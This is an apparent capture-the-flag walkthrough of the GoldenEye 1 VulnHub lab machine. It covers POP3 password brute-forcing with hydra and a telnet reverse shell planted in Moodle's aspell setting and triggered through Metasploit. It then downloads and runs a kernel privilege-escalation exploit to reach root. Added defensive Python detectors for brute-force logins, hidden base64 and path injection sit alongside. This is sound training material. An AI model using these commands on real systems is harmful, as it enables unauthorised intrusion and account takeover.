
GoldenEye 1 VulnHub CTF Penetration Test Write-up

9 min read · IceKam

Introduction

I recently finished building an OSCP-style vulnerable machine themed on the great James Bond film (and even better N64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.

I rated it intermediate; there are several ways to get root, with no exploit development/buffer overflows. Having just finished OSCP, I thought this would be good practice, with a hint of CTF flavour.

I built and verified it on both VMware and VirtualBox. You won't need any tools beyond a default Kali install. Networking must be set to host-only, and on VMware you may need to click "Retry" if prompted when first starting it, because of how it was formatted.

Name: GoldenEye: 1
Date: 4 May 2018
Author: creosote
Series: GoldenEye

Reconnaissance

Use nmap to gather network information.

```bash
$ nmap -sN 192.168.123.1/24
Starting Nmap 7.70 ( https://nmap.org ) at CST
Nmap scan report for Sec.lan (192.168.123.1)
Nmap scan report for ubuntu.lan (192.168.123.126)
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT   STATE         SERVICE
25/tcp open|filtered smtp
80/tcp open|filtered http
MAC Address: 08:00:27:46:E1:60 (Oracle VirtualBox virtual NIC)


root @ Sec in /tmp
$ dirb http://192.168.123.126/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

URL_BASE: http://192.168.123.126/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.123.126/ ----
+ http://192.168.123.126/index.html (CODE:200|SIZE:252)
+ http://192.168.123.126/server-status (CODE:403|SIZE:295)

-----------------
```

Ports 80 and 25 appear open (reported as open|filtered, since a NULL scan cannot tell those two states apart) and the directory scan is unremarkable, so let's refine the scan with a full-port SYN scan plus version detection.

```bash
$ nmap -A -p- -sS 192.168.123.126
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for ubuntu.lan (192.168.123.126)
Host is up (0.00031s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: TLS randomness does not represent time
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/unknown
55007/tcp open  unknown
MAC Address: 08:00:27:46:E1:60 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms ubuntu.lan (192.168.123.126)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.70 second
```

Website analysis

Opening the site shows the following prompt:

```bash
Severnaya Auxiliary Control Station
****TOP SECRET ACCESS****
Accessing Server Identity
Server Name:....................
GOLDENEYE

User: UNKNOWN
Naviagate to /sev-home/ to login
```
  • Clearly /sev-home/ is a login page.

Viewing the page source, terminal.js contains an obfuscated string (shown here already decoded):

InvincibleHack3r

  • Decoded: InvincibleHack3r (you can use the decoding tools in Kali Linux or an online decoder).

//Boris, make sure you update your default password.

  • Two users collected: boris and natalya.

Then use this information to try logging in at /sev-home/.

Login successful.

Website analysis 2

After logging in, the following information is shown:

GOLDENEYE
GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) (as if.)
Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system (hint: the mail system is involved)
Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port (hint: a non-default port)

Cracking the mail accounts

Right, a non-default port: the scan above found port 55007, so let's try brute-forcing it.

pop3 A

```bash
$ hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.123.126 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra)
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.123.126:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 72.00 tries/min, 144 tries in 00:02h, 78 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.123.126   login: boris   password: secret1!
[STATUS] attack finished for 192.168.123.126 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
```
  • Cracked with hydra: username boris, wordlist fasttrack.
  • Credentials found: login: boris password: secret1!

pop3 B

Crack the second user:

```bash
$ hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.123.126 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra)
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.123.126:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.123.126   login: natalya   password: bird
[STATUS] attack finished for 192.168.123.126 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
```
  • Cracked with hydra: username natalya, wordlist fasttrack.
  • Credentials found: login: natalya password: bird
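From the defender's side, the two hydra runs above leave an obvious footprint: a burst of failed POP3 logins from a single address followed by a success. The Python below is an added example (not part of the original write-up) that scans mail-server authentication log lines for exactly that pattern. The log format, the sample lines and the threshold/window values are constructed assumptions; adapt LOG_RE to whatever your POP3 server actually writes.

```python
"""Flag POP3 password-guessing bursts in mail-server authentication logs.

Added example, not part of the original write-up. The log format is a
constructed, simplified one:
    <ISO timestamp> pop3-login: auth failed|login ok user=<name> rip=<client ip>
Real servers log differently; adapt LOG_RE to yours.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) pop3-login: "
    r"(?P<result>auth failed|login ok) user=(?P<user>\S+) rip=(?P<ip>\S+)$"
)


def parse_line(line):
    """Turn one log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S"),
        "ok": m["result"] == "login ok",
        "user": m["user"],
        "ip": m["ip"],
    }


def find_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {(client_ip, user): info} for pairs with >= `threshold` failed
    logins inside a sliding `window`. info["success_after_burst"] is set when
    a later successful login follows, which is the footprint a wordlist
    attack like the one above leaves behind."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    recent_fails = defaultdict(list)   # (ip, user) -> failure timestamps in window
    hits = {}
    for e in events:
        key = (e["ip"], e["user"])
        if e["ok"]:
            if key in hits:
                hits[key]["success_after_burst"] = True
            continue
        q = recent_fails[key]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:   # expire failures older than the window
            q.pop(0)
        if len(q) >= threshold:
            info = hits.setdefault(key, {"peak_failures": 0, "success_after_burst": False})
            info["peak_failures"] = max(info["peak_failures"], len(q))
    return hits


def constructed_log():
    """Constructed sample: one source hammering 'boris' and then succeeding,
    plus a legitimate user who mistypes once."""
    base = datetime(2018, 5, 4, 10, 0, 0)
    fmt = "%Y-%m-%dT%H:%M:%S"
    lines = [
        f"{(base + timedelta(seconds=4 * i)).strftime(fmt)} "
        "pop3-login: auth failed user=boris rip=192.168.123.1"
        for i in range(14)
    ]
    lines.append(f"{(base + timedelta(seconds=60)).strftime(fmt)} "
                 "pop3-login: login ok user=boris rip=192.168.123.1")
    lines.append("2018-05-04T10:05:00 pop3-login: auth failed user=natalya rip=10.0.0.5")
    lines.append("2018-05-04T10:05:07 pop3-login: login ok user=natalya rip=10.0.0.5")
    return lines


if __name__ == "__main__":
    for (ip, user), info in find_bruteforce(constructed_log()).items():
        print(f"{ip} -> {user}: {info}")
```

The sliding window is what separates a hydra run (tens of failures per minute against one mailbox) from a user mistyping a password; the "success after burst" flag is the alert worth paging on, because it means the wordlist contained the real password, as fasttrack did here.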

Mail analysis

Log in with the cracked account and read the inbox.

```bash
$ telnet 192.168.123.126 55007
Trying 192.168.123.126...
Connected to 192.168.123.126.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id D9E47454B1
    for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.

RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id C3F2B454B1
    for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id 4B9F4454B1
    for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.
```

Nothing very useful there; try the second account.

```bash
root @ Sec in /tmp
$ telnet 192.168.123.126 55007
Trying 192.168.123.126...
Connected to 192.168.123.126.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id D5EDA454B1
    for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id 17C96454B1
    for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
```

We obtain a credential pair: username: xenia, password: RCP90rulez!
We also get a domain and directory: severnaya-station.com/gnocertdir

Website 3

With this information, point the domain at the target in the hosts file and visit it.

```bash
echo "192.168.123.126 severnaya-station.com" >> /etc/hosts
```

The site loads, and there is a login URL:
http://severnaya-station.com/gnocertdir/login/index.php
Log in with the credentials above.
After logging in I found a place where PHP could be uploaded, but I couldn't exploit it, so I changed approach.

A message in the mail reveals: My email username is..doak

Try brute-forcing doak's account.

```bash
$ hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.123.126 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.123.126:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.123.126   login: doak   password: goat
```

Cracked: login: doak password: goat. Now log in with telnet.

```bash
$ telnet 192.168.123.126 55007
Trying 192.168.123.126...
Connected to 192.168.123.126.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id 97DC24549D
    for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!
```

We get another credential pair: username: dr_doak, password: 4England!. Log in to the web site with it.

After logging in, the private files area contains a file s3cret.txt; download and open it:

```bash
$ cat s3cret.txt
007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
```

There's a hint pointing to an image; download it and take a look.

```bash
root@Sec:/tmp# strings for-007.jpg
JFIF
Exif
eFdpbnRlcjE5OTV4IQ==
```

That's base64; decode it.

```bash
root@Sec:/tmp# echo eFdpbnRlcjE5OTV4IQ== | base64 -d
xWinter1995x!
```

It decodes to a password: xWinter1995x!

Logging in to the web site as the admin user with this password succeeds.
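The strings/base64 step above is worth automating when triaging files that might carry stashed credentials. The Python below is an added example (not part of the original write-up): it finds runs of base64 characters in a binary blob, keeps only the runs that are well-formed and decode to printable ASCII, and reports them with their byte offsets. The sample image bytes are constructed to look like a JPEG with Exif data, not the real for-007.jpg, and include two decoys that a naive `strings | base64 -d` would trip over.

```python
"""Hunt for base64-encoded text hidden in binary files (image metadata etc.).

Added example, not from the original write-up. It automates the
`strings` + `base64 -d` step: find runs of base64 alphabet characters, keep
only those that decode cleanly to printable ASCII, and report their offsets.
The sample "image" below is constructed, not the real for-007.jpg.
"""
import base64
import binascii
import re

# A run of >= 16 base64 chars with optional padding, not glued to other base64 chars.
B64_RUN = re.compile(rb"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")


def base64_candidates(blob):
    """Return [(offset, token, decoded_text)] for every run in `blob` that is
    well-formed base64 and decodes to printable ASCII."""
    found = []
    for m in B64_RUN.finditer(blob):
        token = m.group(0)
        if len(token) % 4:            # valid base64 is always a multiple of 4 chars
            continue
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            continue
        # runs like 'AAAA...' decode fine but to NUL/control bytes: not a stashed secret
        if text and all(32 <= ord(c) < 127 for c in text):
            found.append((m.start(), token.decode("ascii"), text))
    return found


# Constructed stand-in for an image: JPEG/Exif markers, a decoy run that
# decodes to NUL bytes, an odd-length run, and one real encoded string.
CONSTRUCTED_JPEG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00"
    b"\xff\xe1\x00\x40Exif\x00\x00"
    b"\x00AAAAAAAAAAAAAAAAAAAAAAAA\x00"   # 24 'A's -> 18 NUL bytes, rejected
    b"\x00abcdefghijklmnopqrs\x00"        # 19 chars, not a multiple of 4, rejected
    b"\x00eFdpbnRlcjE5OTV4IQ==\n"         # the kind of string strings(1) showed above
    b"\xff\xd9"
)


def scan_file(path):
    """Convenience wrapper for a real file on disk."""
    with open(path, "rb") as fh:
        return base64_candidates(fh.read())


if __name__ == "__main__":
    for offset, token, text in base64_candidates(CONSTRUCTED_JPEG):
        print(f"offset {offset}: {token} -> {text!r}")
```

Run it as `scan_file("for-007.jpg")` against a real file; the offset tells you which segment of the image (here, the Exif area) the string lives in, which is the detail you want when writing up how the credential leaked.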

Reverse shell

The page http://severnaya-station.com/gnocertdir/admin/settings.php?section=systempaths has a setting that can directly run a reverse shell.

Path to aspell: To use spell-checking within the editor, you MUST have aspell 0.50 or later installed on your server, and you must specify the correct path to access the aspell binary. On Unix/Linux systems, this path is usually /usr/bin/aspell, but it might be something else.
The field already contains: sh -c '(sleep 4062|telnet 192.168.230.132 4444|while : ; do sh && break; done 2>&1|telnet 192.168.230.132 4444 >/dev/null 2>&1 &)'

Following that hint, and after some searching, we enter the following command:

```bash
sh -c '(sleep 10|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
```

Then save, and on the plugin page /gnocertdir/admin/settings.php?section=editorsettingstinymce change the editor's spell engine to PSpellShell.
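The root cause here is a "path to binary" setting whose value ends up being handed to a shell, so anything a shell can interpret becomes command execution as the web server user. The Python below is an added example, not Moodle's code and not from the original write-up: it audits such a setting, showing the correct value (/usr/bin/aspell) beside a constructed weak value of the same shape as the payload above, and builds the argv list a safe invocation would use instead of a shell string. The function names, the documentation address 192.0.2.10 and the weak value are assumptions.

```python
"""Audit 'path to external binary' settings for command injection.

Added example, not part of the original write-up or of Moodle. A setting
such as "Path to aspell" must be a plain absolute path; if the application
hands it to a shell (the PSpellShell route abused above), shell
metacharacters in the value become arbitrary command execution. The weak
value is a constructed stand-in; 192.0.2.10 is a documentation address.
"""
import re

SHELL_META = ";|&$`()<>'\"\\ \t\n*?[]{}~"


def check_binary_path_setting(value):
    """Return a list of findings; an empty list means the value is a plain
    absolute path with nothing a shell could interpret."""
    findings = []
    if value == "":
        return findings             # feature disabled, nothing will be executed
    if not value.startswith("/"):
        findings.append("not an absolute path")
    bad = sorted({c for c in value if c in SHELL_META})
    if bad:
        findings.append("contains shell metacharacters: " + repr("".join(bad)))
    if ".." in value.split("/"):
        findings.append("contains a '..' traversal component")
    if not re.fullmatch(r"/[A-Za-z0-9._/-]+", value):
        findings.append("characters outside the expected path alphabet")
    return findings


def build_argv(value, args):
    """How the application should invoke the tool: an argv list (run with
    subprocess.run(argv), never shell=True), and only after the setting
    passed the audit. Returns None when the value is unsafe."""
    if check_binary_path_setting(value):
        return None
    return [value, *args]


GOOD_VALUE = "/usr/bin/aspell"
WEAK_VALUE = "sh -c 'telnet 192.0.2.10 4444 | sh'"   # constructed, same shape as above

if __name__ == "__main__":
    for name, value in [("good", GOOD_VALUE), ("weak", WEAK_VALUE)]:
        print(name, check_binary_path_setting(value) or "OK")
    print(build_argv(GOOD_VALUE, ["-a", "--lang=en"]))
```

Two things follow for anyone running a site like this: the admin account that can edit system paths is effectively a shell account, so it deserves the same password and MFA policy as SSH; and a periodic audit of these settings (a cron job calling the check above against the stored values) catches the modification even if the login was legitimate.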

Triggering the reverse shell

```bash
msf > use exploit/multi/http/moodle_cmd_exec
msf exploit(multi/http/moodle_cmd_exec) > set rhost severnaya-station.com
rhost => severnaya-station.com
msf exploit(multi/http/moodle_cmd_exec) > set targeturi /gnocertdir
targeturi => /gnocertdir
msf exploit(multi/http/moodle_cmd_exec) > set username admin
username => admin
msf exploit(multi/http/moodle_cmd_exec) > set password xWinter1995x!
password => xWinter1995x!
msf exploit(multi/http/moodle_cmd_exec) > exploit

[*] Started reverse TCP double handler on 192.168.123.1:4444
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo GaQ5qcFq6kLgIKHr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "GaQ5qcFq6kLgIKHr\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.126:48764)
```

Privilege escalation

With a shell, upgrade it to a pty and gather kernel information.

```bash
python -c 'import pty; pty.spawn("/bin/sh");'
$ cd /tmp
cd /tmp
$ ls
ls
$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic
$ cat /etc/lsb/release
cat /etc/lsb/release
cat: /etc/lsb/release: No such file or directory
$ cat /etc/lsb-release
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
```

Search for kernel exploits.

```bash
$ searchsploit Ubuntu 14.04 3.13
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12. | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12. | exploits/linux/local/37293.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
```

Preparing the exploit

I tried gcc, but it can't compile on the target; a search showed that clang can be used instead.

```bash
$ cp /usr/share/exploitdb/exploits/linux/local/37292.c /tmp
$ sed -i 's/gcc/clang/g' 37292.c
```

Replace gcc with clang in the source and start a web server to serve it.

```bash
$ python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
```

Compiling the exploit

Download, compile and run the exploit on the target.

```bash
wget http://192.168.123.1/37292.c
$ clang 37292.c -o sec
$ ./sec
./sec
spawning threads
mount
mount
child threads done
/etc/ld.so.preload created
creating shared library
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
```

Getting the flag

```bash
cd /root
ls -a
.  ..  .bash_history  .bashrc  .cache  .flag.txt  .profile  .rnd  .viminfo
cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/
```

Takeaways

This box is excellent: it looks simple, but every step chains into the next, and there are more vulnerabilities on it worth trying; there are plenty of ways through.


Author: IceKam
Self-described tea-tasting "expert" and low-end word-pusher.